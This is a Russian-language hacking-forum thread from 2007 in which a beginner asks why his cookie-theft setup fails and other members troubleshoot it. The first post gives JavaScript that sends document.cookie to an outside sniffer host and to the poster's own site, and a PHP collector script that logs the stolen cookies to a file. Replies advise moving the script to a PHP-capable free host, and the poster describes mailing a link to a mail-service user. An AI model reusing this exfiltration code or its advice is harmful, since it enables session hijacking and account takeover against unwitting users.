HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

на счет перехвата cookies. что я не так делаю?
  #1  
Старый 19.07.2007, 12:27
Miixxa
Новичок
Регистрация: 17.07.2007
Сообщений: 17
С нами: 9904189

Репутация: 0
По умолчанию на счет перехвата cookies. что я не так делаю?

вообщем у меня вопрос на счет перехвата cookies, можете мне объяснить, что я не так делаю?
вот есть скажем к примеру:
1. лог сниффера http://hackedpro.org/tools/sniff/log.php
2. адресс сниффера http://hackedpro.org/tools/sniff/s.gif

начала с того что просто тупо в браузере ввел:
http://hackedpro.org/tools/sniff/s.gif?document.cookie

в логе посмотрел, получил инфу кроме моего cookies

далее создал файл с раширением html в котором:
<script>
img = new Image();
img.src = "http://hackedpro.org/tools/sniff/s.gif?"+document.cookie;
</script>

запустил его, эффект тот же (все кроме cookies).

Далее разместил на сайте www.miixxa.narod.ru
2 файла:
первый php-script.php в котором:
<?
$query="{$HTTP_GET_VARS['com'] }\r\n"; //эта часть скрипта принимает украденные cookies, переданные JavaScript'ом.
$file="cookies.txt"; //здесь мы определили файл, куда будет производиться запись полученных cookies.
if (is_writeable ($file)) { //проверяем можно ли производить запись в файл.
$fh=fopen ($file, "a+"); //открыли файл для записи, запись всегда будет производиться в конец файла.
fputs ($fh, "$query"); //записали cookies в файл.
fclose ($fh); } //после записи закрыли файл.
else {
echo "Error!"; //Этот скрипт не просто запишет украденные cookie, но и скажет нам если вышла какая-то ошибка.
}
?>

и второй файл cookies.txt

Создал третий файл 1.html в котором:

<script>
img = new Image();
img.src = "http://www.miixxa.narod.ru/php-script.php?com="+document.cookie;
</script>

запустил этот файл, проверил cookies.txt - ничего.

Что я не так делаю? можете помочь?

Последний раз редактировалось Miixxa; 19.07.2007 в 12:43.. Причина: все верно, я просто не внимательный, у меня имена файлов были верные, здесь на форуме ошибся. Жду помощи.
 
Ответить с цитированием

  #2  
Старый 19.07.2007, 12:38
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами: 10393869

Репутация: 2032


По умолчанию

Цитата:
Сообщение от Miixxa  
начала с того что просто тупо в браузере ввел...
ты с полом все-таки определись))

1.php и php-script.php - разные названия одного скрипта, а они должны совпадать =)
 
Ответить с цитированием

  #3  
Старый 19.07.2007, 12:44
Miixxa
Новичок
Регистрация: 17.07.2007
Сообщений: 17
С нами: 9904189

Репутация: 0
По умолчанию

отредактировал, по именам фалов все ок, просто здесь ошибься.... Жду помощи в чем моя ошибка...
 
Ответить с цитированием

  #4  
Старый 19.07.2007, 12:50
n3m0
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
С нами: 10001186

Репутация: 247
По умолчанию

На НАРОД.Ру вроде нету поддержки Php
 
Ответить с цитированием

  #5  
Старый 19.07.2007, 12:51
Y.Dmitriy
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
С нами: 10084646

Репутация: 161
По умолчанию

Это бред какой-то... почитай в манах как это делать(там все написано!), попробуй на себе...
 
Ответить с цитированием

  #6  
Старый 19.07.2007, 12:55
Miixxa
Новичок
Регистрация: 17.07.2007
Сообщений: 17
С нами: 9904189

Репутация: 0
По умолчанию

да, живопись интереснее, там все понятнее может мне кто-нибудь укажет конкретно что мне изменить в моих действиях, в файлах....?
 
Ответить с цитированием

  #7  
Старый 19.07.2007, 12:57
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами: 10393869

Репутация: 2032


По умолчанию

Цитата:
Сообщение от Miixxa  
да, живопись интереснее, там все понятнее может мне кто-нибудь укажет конкретно что мне изменить в моих действиях, в файлах....?
хостера тебе надо изменить
 
Ответить с цитированием

  #8  
Старый 19.07.2007, 12:59
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,187
С нами: 10495046

Репутация: 2642


По умолчанию

Цитата:
Сообщение от Miixxa  
да, живопись интереснее, там все понятнее может мне кто-нибудь укажет конкретно что мне изменить в моих действиях, в файлах....?
поменяй хостинг, на котором лежит php-script.php, на любой с поддержкой PHP (tulpar.net, fatal.ru, holm.ru, 6te.net......)
 
Ответить с цитированием

  #9  
Старый 19.07.2007, 13:02
Miixxa
Новичок
Регистрация: 17.07.2007
Сообщений: 17
С нами: 9904189

Репутация: 0
По умолчанию

т.е. запуская файл 1.html я краду кукесы с народа.ру? а если разместить данный файл также на народе а в мыле адресу вставить ссылку на него, то кукесы опять с народа будут?
 
Ответить с цитированием

  #10  
Старый 19.07.2007, 13:03
Y.Dmitriy
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
С нами: 10084646

Репутация: 161
По умолчанию

ДА НЕТ НА НАРОДЕ ИНТЕРПРИТАТОРА ПХП ФАЙЛОВ... там только статический файлы .html, .xhtml и тд... тебе нужон хостинг с поддержкой ПХП! удачи!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Социальная инженерия The real Dr.Lector Болталка 10 22.12.2008 20:45
Последние секреты тети Аси - Вся правда об Icq rijy Skype, IRC, ICQ, Jabber и другие IM 28 02.12.2007 07:00
Боевые вирусы (БВ). TTN_ Мировые новости. Обсуждения. 2 03.10.2006 08:30
Небольшой отрывок от книги T-REX Болталка 0 19.10.2004 05:19



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.